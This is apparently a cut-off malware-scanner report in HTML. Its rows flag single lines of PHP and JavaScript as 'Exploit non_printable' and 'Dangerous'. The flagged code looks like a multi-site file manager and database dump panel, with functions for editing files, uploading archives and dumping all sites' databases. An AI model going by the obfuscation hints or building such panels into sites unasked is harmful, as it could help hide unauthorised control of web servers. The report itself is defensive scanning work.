</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteUpdateSaveStatusesButton</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 247</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_normalize_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCollectStatuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">sel</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">map</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteSaveAllStatuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteFilterByStatus</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2524</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">row</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2538</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbSetFields</span><span style="color: #007700">(</span><span style="color: #0000BB">f</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2547</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbParseSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$real</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbFillFromSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbBuildDumpFormData</span><span style="color: #007700">(</span><span style="color: #0000BB">extra</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fd</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 258</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_key</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDownloadBlob</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">, </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fetch</span><span style="color: #007700">(</span><span style="color: #0000BB">APP_ENDPOINT_URL </span><span style="color: #007700">|| </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location</span><span style="color: #007700">.</span><span style="color: #0000BB">href</span><span style="color: #007700">, { </span><span style="color: #0000BB">method</span><span style="color: #007700">: </span><span style="color: #DD0000">'POST'</span><span style="color: #007700">, </span><span style="color: #0000BB">body</span><span style="color: #007700">: </span><span style="color: #0000BB">fd</span><span style="color: #007700">, </span><span style="color: #0000BB">credentials</span><span style="color: #007700">: </span><span style="color: #DD0000">'same-origin' </span><span style="color: #007700">})</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2597</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">json</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">j</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_runtime_base_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">blob</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">blob</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 260</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'p:' </span><span style="color: #007700">. </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$norm</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fname</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">fname</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'n:' </span><span style="color: #007700">. </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2632</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpManual</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpSite</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2644</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbParseSiteSnippet</span><span style="color: #007700">(</span><span style="color: #0000BB">siteName</span><span style="color: #007700">, </span><span style="color: #0000BB">cms</span><span style="color: #007700">, </span><span style="color: #0000BB">siteUrl</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_file_path</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2667</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dbDownloadBlob</span><span style="color: #007700">(</span><span style="color: #0000BB">dbBuildDumpFormData</span><span style="color: #007700">({</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2673</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">alert</span><span style="color: #007700">(</span><span style="color: #DD0000">'❌ ' </span><span style="color: #007700">+ </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpAllSites</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$resolved</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2681</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">next</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2718</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">extIcon</span><span style="color: #007700">(</span><span style="color: #0000BB">ext</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2721</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_extIcons</span><span style="color: #007700">[</span><span style="color: #0000BB">e</span><span style="color: #007700">] || </span><span style="color: #DD0000">'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2724</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">openFM</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">siteName</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'sys_get_temp_dir'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeFM</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'fm-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmLoad</span><span style="color: #007700">(</span><span style="color: #0000BB">dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2756</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFMList</span><span style="color: #007700">(</span><span style="color: #0000BB">items</span><span style="color: #007700">, </span><span style="color: #0000BB">current</span><span style="color: #007700">, </span><span style="color: #0000BB">root</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">item</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2790</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmOpenFile</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">size</span><span style="color: #007700">, </span><span style="color: #0000BB">ext</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_RUNTIME_BASE_DIR</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2836</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmStartEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2851</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmDiscardEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmSaveFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2871</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">fmDiscardEdit</span><span style="color: #007700">(); </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">.</span><span style="color: #0000BB">textContent</span><span style="color: #007700">=</span><span style="color: #DD0000">''</span><span style="color: #007700">; }, </span><span style="color: #0000BB">1500</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2884</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmNewFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2893</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeNewFileModal</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2896</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmCreateFile</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2934</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmImportArchive</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmUploadArchive</span><span style="color: #007700">(</span><span style="color: #0000BB">file</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_states_migrate</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2965</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmRenameItem</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">isDir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
